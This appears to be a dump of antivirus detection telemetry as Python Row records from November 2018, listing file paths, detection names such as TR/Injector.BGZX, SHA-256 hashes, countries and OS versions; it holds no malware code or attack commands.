  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153956-0c75753b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153956-0C75753B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053140-8bdd3dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053140-8BDD3DC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075cc', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075cc', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T182808-00009/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051934-dad08d95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051934-DAD08D95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054730-c22607ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054730-C22607AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-063102-231a6ebe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_daa2929d\\AVSCAN-20181102-063036-1F0B4221\\AVSCAN-20181102-063102-231A6EBE', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6d82d3190d55d4321b8670d32f4398b21297316bb563efb9e9d9f6b20415470c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-3.categorizing\\6D82D3190D55D4321B8670D32F4398B21297316BB563EFB9E9D9F6B20415470C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6d82d3190d55d4321b8670d32f4398b21297316bb563efb9e9d9f6b20415470c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T16:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gcspgqvn.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\gCSPgqVN.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100214-ba1bd9e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100148-B6DD3C51\\AVSCAN-20181102-100214-BA1BD9E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A2DB419DB9E49E45998E30CFC3C61E0BE4E917C85B67C4C68F4445BD16794E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a2db419db9e49e45998e30cfc3c61e0be4e917c85b67c4c68f4445bd16794e6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:16:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120616-1922edfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120616-1922EDFE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeachw.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\NBEACHW\\NBEACHW.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061352-70c53bc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061352-70C53BC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132232-10c3f053', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132232-10C3F053', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052238-48e5655d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052238-48E5655D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170710-99d58c8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e785e07\\AVSCAN-20181102-170623-94605AA9\\AVSCAN-20181102-170710-99D58C8B', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.095\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.095\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e5c', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e5c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052833-1c105290', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052833-1C105290', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053146-8f03b8d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053146-8F03B8D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13ca0dff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13CA0DFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050438-c51692ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050438-C51692EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053020-5c088f38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053020-5C088F38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053301-bbeabb70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053301-BBEABB70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062000-4bf81d08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062000-4BF81D08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061620-c9213d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061620-C9213D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054952-167d89de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054952-167D89DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061729-f2502c8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061729-F2502C8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061614-c5a08f10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061614-C5A08F10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055048-38262c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055048-38262C61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062625-3195e3c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062625-3195E3C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061819-0fe33582', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061819-0FE33582', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050955-82135fd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050955-82135FD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051616-64be79f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051616-64BE79F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055151-5d53c4d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055151-5D53C4D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0ef9f4b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0EF9F4B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061139-219d50a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061139-219D50A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050919-6c915c33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050919-6C915C33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060542-4cbd4f67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060542-4CBD4F67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051058-a740014b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051058-A740014B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054626-9bd840a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054626-9BD840A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052749-022df0fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052749-022DF0FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052342-6e966ba0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052342-6E966BA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053809-73a95ecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053809-73A95ECD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053338-d2267fb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053338-D2267FB3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055157-61639209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055157-61639209', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060909-c851808a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060909-C851808A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051401-14404bb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051401-14404BB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:29Z'), dt=datetime.date(2018, 11, 2)),
